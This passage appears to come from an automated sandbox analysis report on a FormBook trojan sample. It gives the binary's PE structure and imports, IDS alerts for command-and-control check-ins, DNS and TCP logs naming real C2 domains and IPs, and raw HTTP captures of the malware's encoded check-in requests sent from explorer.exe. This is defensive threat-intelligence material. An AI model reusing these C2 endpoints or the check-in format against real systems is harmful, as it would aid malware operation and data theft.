                                          call dword ptr [0040726Ch]
                                          mov dword ptr [00423FF8h], eax
                                          push ebx
                                          lea eax, dword ptr [esp+38h]
                                          push 00000160h
                                          push eax
                                          push ebx
                                          push 0041F4F0h
                                          call dword ptr [0040715Ch]
                                          push 0040915Ch
                                          push 00423740h
                                          call 00007F34348B6534h
                                          call dword ptr [0040710Ch]
                                          mov ebp, 0042A000h
                                          push eax
                                          push ebp
                                          call 00007F34348B6522h
                                          push ebx
                                          call dword ptr [00407144h]

                                          Rich Headers

                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x74180xa0.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000x9e0.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x5aeb0x5c00False0.665123980978data6.42230569414IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rdata0x70000x11960x1200False0.458984375data5.20291736659IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0x90000x1b0380x600False0.432291666667data4.0475118296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .rsrc0x2d0000x9e00xa00False0.45625data4.50948350161IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_ICON0x2d1900x2e8dataEnglishUnited States
                                          RT_DIALOG0x2d4780x100dataEnglishUnited States
                                          RT_DIALOG0x2d5780x11cdataEnglishUnited States
                                          RT_DIALOG0x2d6980x60dataEnglishUnited States
                                          RT_GROUP_ICON0x2d6f80x14dataEnglishUnited States
                                          RT_MANIFEST0x2d7100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                          Imports

                                          DLLImport
                                          KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                          USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                          SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                          ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                          COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          10/13/21-16:44:25.292716TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979080192.168.2.534.102.136.180
                                          10/13/21-16:44:25.292716TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979080192.168.2.534.102.136.180
                                          10/13/21-16:44:25.292716TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979080192.168.2.534.102.136.180
                                          10/13/21-16:44:25.406375TCP1201ATTACK-RESPONSES 403 Forbidden804979034.102.136.180192.168.2.5
                                          10/13/21-16:44:46.515561TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979380192.168.2.574.208.236.134
                                          10/13/21-16:44:46.515561TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979380192.168.2.574.208.236.134
                                          10/13/21-16:44:46.515561TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979380192.168.2.574.208.236.134
                                          10/13/21-16:45:02.310893TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979780192.168.2.53.64.163.50
                                          10/13/21-16:45:02.310893TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979780192.168.2.53.64.163.50
                                          10/13/21-16:45:02.310893TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979780192.168.2.53.64.163.50
                                          10/13/21-16:45:07.452062TCP1201ATTACK-RESPONSES 403 Forbidden804979823.227.38.74192.168.2.5

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 13, 2021 16:44:14.514519930 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:14.661742926 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:14.661844015 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:14.661981106 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:14.810870886 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:14.906196117 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:14.906234980 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:14.906253099 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:14.906270027 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:14.906289101 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:14.906325102 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:14.906372070 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:14.906387091 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:14.906414986 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:14.956698895 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:15.011696100 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:15.053379059 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:15.053442001 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:15.053488970 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:15.053539991 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:15.053559065 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:15.053606987 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:15.097364902 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:15.103019953 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:15.103055954 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:15.103141069 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:15.160053015 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:15.199894905 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:15.199920893 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:15.199973106 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:15.200011015 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:15.306546926 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:15.307334900 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:25.274435043 CEST4979080192.168.2.534.102.136.180
                                          Oct 13, 2021 16:44:25.292285919 CEST804979034.102.136.180192.168.2.5
                                          Oct 13, 2021 16:44:25.292598009 CEST4979080192.168.2.534.102.136.180
                                          Oct 13, 2021 16:44:25.292716026 CEST4979080192.168.2.534.102.136.180
                                          Oct 13, 2021 16:44:25.310540915 CEST804979034.102.136.180192.168.2.5
                                          Oct 13, 2021 16:44:25.406374931 CEST804979034.102.136.180192.168.2.5
                                          Oct 13, 2021 16:44:25.406408072 CEST804979034.102.136.180192.168.2.5
                                          Oct 13, 2021 16:44:25.406739950 CEST4979080192.168.2.534.102.136.180
                                          Oct 13, 2021 16:44:25.406987906 CEST4979080192.168.2.534.102.136.180
                                          Oct 13, 2021 16:44:25.424902916 CEST804979034.102.136.180192.168.2.5
                                          Oct 13, 2021 16:44:41.083808899 CEST4979180192.168.2.546.101.121.244
                                          Oct 13, 2021 16:44:41.114418030 CEST804979146.101.121.244192.168.2.5
                                          Oct 13, 2021 16:44:41.114691019 CEST4979180192.168.2.546.101.121.244
                                          Oct 13, 2021 16:44:41.115659952 CEST4979180192.168.2.546.101.121.244
                                          Oct 13, 2021 16:44:41.150091887 CEST804979146.101.121.244192.168.2.5
                                          Oct 13, 2021 16:44:41.303195953 CEST804979146.101.121.244192.168.2.5
                                          Oct 13, 2021 16:44:41.303220034 CEST804979146.101.121.244192.168.2.5
                                          Oct 13, 2021 16:44:41.303375959 CEST4979180192.168.2.546.101.121.244
                                          Oct 13, 2021 16:44:41.303476095 CEST4979180192.168.2.546.101.121.244
                                          Oct 13, 2021 16:44:41.326456070 CEST804979146.101.121.244192.168.2.5
                                          Oct 13, 2021 16:44:46.371398926 CEST4979380192.168.2.574.208.236.134
                                          Oct 13, 2021 16:44:46.515207052 CEST804979374.208.236.134192.168.2.5
                                          Oct 13, 2021 16:44:46.515362024 CEST4979380192.168.2.574.208.236.134
                                          Oct 13, 2021 16:44:46.515561104 CEST4979380192.168.2.574.208.236.134
                                          Oct 13, 2021 16:44:46.662605047 CEST804979374.208.236.134192.168.2.5
                                          Oct 13, 2021 16:44:46.664726973 CEST804979374.208.236.134192.168.2.5
                                          Oct 13, 2021 16:44:46.664763927 CEST804979374.208.236.134192.168.2.5
                                          Oct 13, 2021 16:44:46.665534973 CEST4979380192.168.2.574.208.236.134
                                          Oct 13, 2021 16:44:46.665771008 CEST4979380192.168.2.574.208.236.134
                                          Oct 13, 2021 16:44:46.814018011 CEST804979374.208.236.134192.168.2.5
                                          Oct 13, 2021 16:45:02.291773081 CEST4979780192.168.2.53.64.163.50
                                          Oct 13, 2021 16:45:02.310440063 CEST80497973.64.163.50192.168.2.5
                                          Oct 13, 2021 16:45:02.310652018 CEST4979780192.168.2.53.64.163.50
                                          Oct 13, 2021 16:45:02.310893059 CEST4979780192.168.2.53.64.163.50
                                          Oct 13, 2021 16:45:02.328926086 CEST80497973.64.163.50192.168.2.5
                                          Oct 13, 2021 16:45:02.328963041 CEST80497973.64.163.50192.168.2.5
                                          Oct 13, 2021 16:45:02.328974009 CEST80497973.64.163.50192.168.2.5
                                          Oct 13, 2021 16:45:02.329202890 CEST4979780192.168.2.53.64.163.50
                                          Oct 13, 2021 16:45:02.329302073 CEST4979780192.168.2.53.64.163.50
                                          Oct 13, 2021 16:45:02.348476887 CEST80497973.64.163.50192.168.2.5

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 13, 2021 16:44:14.384646893 CEST5244153192.168.2.58.8.8.8
                                          Oct 13, 2021 16:44:14.506238937 CEST53524418.8.8.8192.168.2.5
                                          Oct 13, 2021 16:44:20.181121111 CEST6217653192.168.2.58.8.8.8
                                          Oct 13, 2021 16:44:20.211018085 CEST53621768.8.8.8192.168.2.5
                                          Oct 13, 2021 16:44:25.232558966 CEST5959653192.168.2.58.8.8.8
                                          Oct 13, 2021 16:44:25.272434950 CEST53595968.8.8.8192.168.2.5
                                          Oct 13, 2021 16:44:30.433674097 CEST6529653192.168.2.58.8.8.8
                                          Oct 13, 2021 16:44:30.844825983 CEST53652968.8.8.8192.168.2.5
                                          Oct 13, 2021 16:44:35.857575893 CEST6318353192.168.2.58.8.8.8
                                          Oct 13, 2021 16:44:36.038960934 CEST53631838.8.8.8192.168.2.5
                                          Oct 13, 2021 16:44:41.058072090 CEST6015153192.168.2.58.8.8.8
                                          Oct 13, 2021 16:44:41.082652092 CEST53601518.8.8.8192.168.2.5
                                          Oct 13, 2021 16:44:46.351602077 CEST5516153192.168.2.58.8.8.8
                                          Oct 13, 2021 16:44:46.370044947 CEST53551618.8.8.8192.168.2.5
                                          Oct 13, 2021 16:44:51.682477951 CEST4999253192.168.2.58.8.8.8
                                          Oct 13, 2021 16:44:52.131743908 CEST53499928.8.8.8192.168.2.5
                                          Oct 13, 2021 16:44:57.200576067 CEST6007553192.168.2.58.8.8.8
                                          Oct 13, 2021 16:44:57.224594116 CEST53600758.8.8.8192.168.2.5
                                          Oct 13, 2021 16:45:02.261354923 CEST5501653192.168.2.58.8.8.8
                                          Oct 13, 2021 16:45:02.290517092 CEST53550168.8.8.8192.168.2.5
                                          Oct 13, 2021 16:45:07.338278055 CEST6434553192.168.2.58.8.8.8
                                          Oct 13, 2021 16:45:07.366216898 CEST53643458.8.8.8192.168.2.5
                                          Oct 13, 2021 16:45:12.463208914 CEST5712853192.168.2.58.8.8.8
                                          Oct 13, 2021 16:45:12.486450911 CEST53571288.8.8.8192.168.2.5

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Oct 13, 2021 16:44:14.384646893 CEST192.168.2.58.8.8.80xfa8aStandard query (0)www.highvizpeople.comA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:20.181121111 CEST192.168.2.58.8.8.80xa615Standard query (0)www.ttemola.comA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:25.232558966 CEST192.168.2.58.8.8.80x4912Standard query (0)www.oddanimalsink.comA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:30.433674097 CEST192.168.2.58.8.8.80x7083Standard query (0)www.umgaleloacademy.comA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:35.857575893 CEST192.168.2.58.8.8.80xafc8Standard query (0)www.baybeg.comA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:41.058072090 CEST192.168.2.58.8.8.80x9ad1Standard query (0)www.itskosi.comA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:46.351602077 CEST192.168.2.58.8.8.80xf190Standard query (0)www.crisisinterventionadvocates.comA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:51.682477951 CEST192.168.2.58.8.8.80x43b1Standard query (0)www.ishhs.xyzA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:57.200576067 CEST192.168.2.58.8.8.80xb3d4Standard query (0)www.sfcn-dng.comA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:45:02.261354923 CEST192.168.2.58.8.8.80x428Standard query (0)www.everythangbutwhite.comA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:45:07.338278055 CEST192.168.2.58.8.8.80xc6a6Standard query (0)www.shopthatlookboutique.comA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:45:12.463208914 CEST192.168.2.58.8.8.80x3df5Standard query (0)www.christinegagnonjewellery.comA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Oct 13, 2021 16:44:14.506238937 CEST8.8.8.8192.168.2.50xfa8aNo error (0)www.highvizpeople.com208.91.197.27A (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:20.211018085 CEST8.8.8.8192.168.2.50xa615Name error (3)www.ttemola.comnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:25.272434950 CEST8.8.8.8192.168.2.50x4912No error (0)www.oddanimalsink.comoddanimalsink.comCNAME (Canonical name)IN (0x0001)
                                          Oct 13, 2021 16:44:25.272434950 CEST8.8.8.8192.168.2.50x4912No error (0)oddanimalsink.com34.102.136.180A (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:30.844825983 CEST8.8.8.8192.168.2.50x7083Server failure (2)www.umgaleloacademy.comnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:41.082652092 CEST8.8.8.8192.168.2.50x9ad1No error (0)www.itskosi.com46.101.121.244A (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:41.082652092 CEST8.8.8.8192.168.2.50x9ad1No error (0)www.itskosi.com206.189.50.215A (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:46.370044947 CEST8.8.8.8192.168.2.50xf190No error (0)www.crisisinterventionadvocates.com74.208.236.134A (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:52.131743908 CEST8.8.8.8192.168.2.50x43b1Name error (3)www.ishhs.xyznonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:57.224594116 CEST8.8.8.8192.168.2.50xb3d4Name error (3)www.sfcn-dng.comnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:45:02.290517092 CEST8.8.8.8192.168.2.50x428No error (0)www.everythangbutwhite.com3.64.163.50A (IP address)IN (0x0001)
                                          Oct 13, 2021 16:45:07.366216898 CEST8.8.8.8192.168.2.50xc6a6No error (0)www.shopthatlookboutique.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                          Oct 13, 2021 16:45:07.366216898 CEST8.8.8.8192.168.2.50xc6a6No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                          Oct 13, 2021 16:45:12.486450911 CEST8.8.8.8192.168.2.50x3df5Name error (3)www.christinegagnonjewellery.comnonenoneA (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.highvizpeople.com
                                          • www.oddanimalsink.com
                                          • www.itskosi.com
                                          • www.crisisinterventionadvocates.com
                                          • www.everythangbutwhite.com

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.549787208.91.197.2780C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Oct 13, 2021 16:44:14.661981106 CEST4115OUTGET /u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdo HTTP/1.1
                                          Host: www.highvizpeople.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 13, 2021 16:44:14.906196117 CEST4117INHTTP/1.1 200 OK
                                          Date: Wed, 13 Oct 2021 14:44:14 GMT
                                          Server: Apache
                                          Set-Cookie: vsid=919vr3816818547928602; expires=Mon, 12-Oct-2026 14:44:14 GMT; Max-Age=157680000; path=/; domain=www.highvizpeople.com; HttpOnly
                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_KQL0Qewm/57A7d4wt4OHK1+3N7YmuFf9rlEyC7xrWthCcsfi2zFqQt+3/QwUNakTWu2Rc2ZBUwg9yn9iy5bcVQ==
                                          Keep-Alive: timeout=5, max=102
                                          Connection: Keep-Alive
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 34 65 36 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 4b 51 4c 30 51 65 77 6d 2f 35 37 41 37 64 34 77 74 34 4f 48 4b 31 2b 33 4e 37 59 6d 75 46 66 39 72 6c 45 79 43 37 78 72 57 74 68 43 63 73 66 69 32 7a 46 71 51 74 2b 33 2f 51 77 55 4e 61 6b 54 57 75 32 52 63 32 5a 42 55 77 67 39 79 6e 39 69 79 35 62 63 56 51 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 68 69 67 68 76 69 7a 70 65 6f 70 6c 65 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 68 69 67 68 76 69 7a 70 65 6f 70 6c 65 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 3b 69 6d
                                          Data Ascii: 4e65<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_KQL0Qewm/57A7d4wt4OHK1+3N7YmuFf9rlEyC7xrWthCcsfi2zFqQt+3/QwUNakTWu2Rc2ZBUwg9yn9iy5bcVQ=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.highvizpeople.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.highvizpeople.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";im
                                          Oct 13, 2021 16:44:14.906234980 CEST4118INData Raw: 67 6c 6f 67 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 68 69 67 68 76 69 7a 70 65 6f 70 6c 65 2e 63 6f 6d 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68
                                          Data Ascii: glog.style.width="0px";imglog.src="http://www.highvizpeople.com/sk-logabpstatus.php?a=MzZzaVd5UDZhY0hEU3Z1UzFXVHRjNXcrTjlwaWZWbWlYbHV5Y0NnYWtjbk1uRloxVlhIUmZTNU4yT1g5a2UwbE5icWlLSTEzYnQ4M3ROQjhpNUU0S003TkN6eE9ROHhTYlFmc3ZrZ0xIbjVNdTBiT2kzZlQ2S
                                          Oct 13, 2021 16:44:14.906253099 CEST4119INData Raw: 72 6c 28 22 68 74 74 70 3a 2f 2f 69 33 2e 63 64 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 66 6f 6e 74 73 2f 6f 70 65 6e 2d 73 61 6e 73 2f 6f 70 65 6e 2d 73 61 6e 73 2e 6f 74 66 22 29 20 66 6f 72 6d 61 74 28 22 6f 70 65 6e
                                          Data Ascii: rl("http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.otf") format("opentype"),url("http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans") format("svg");font-weight: normal;font-style: normal;font-display: swap;}
                                          Oct 13, 2021 16:44:14.906270027 CEST4121INData Raw: 2e 63 6c 65 61 72 66 69 78 7b 7a 6f 6f 6d 3a 31 7d 0d 0a 0d 0a 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 0a 20 20 6f 70 65 6e 2d 73 61 6e 73 20 0a 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 20 62 61
                                          Data Ascii: .clearfix{zoom:1}body{font-family: open-sans ,sans-serif;font-size:12px; background:#fff;font-weight: 400;background: url(http://i3.cdn-image.com/__media__/pics/27587/BG_2.png) no-repeat center bottom; background-size: cover;background-
                                          Oct 13, 2021 16:44:14.906289101 CEST4122INData Raw: 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 7d 0d 0a 0d 0a 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 38 30 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75
                                          Data Ascii: font-size: 12px; text-decoration: underline}.container{width:800px;margin:0 auto;}.searchbox{float:right; width:400px; height:37px;}.srch-txt{float: left; width: 343px; height: 37px; padding:0 10px;font-size: 16px; background: #fff; co
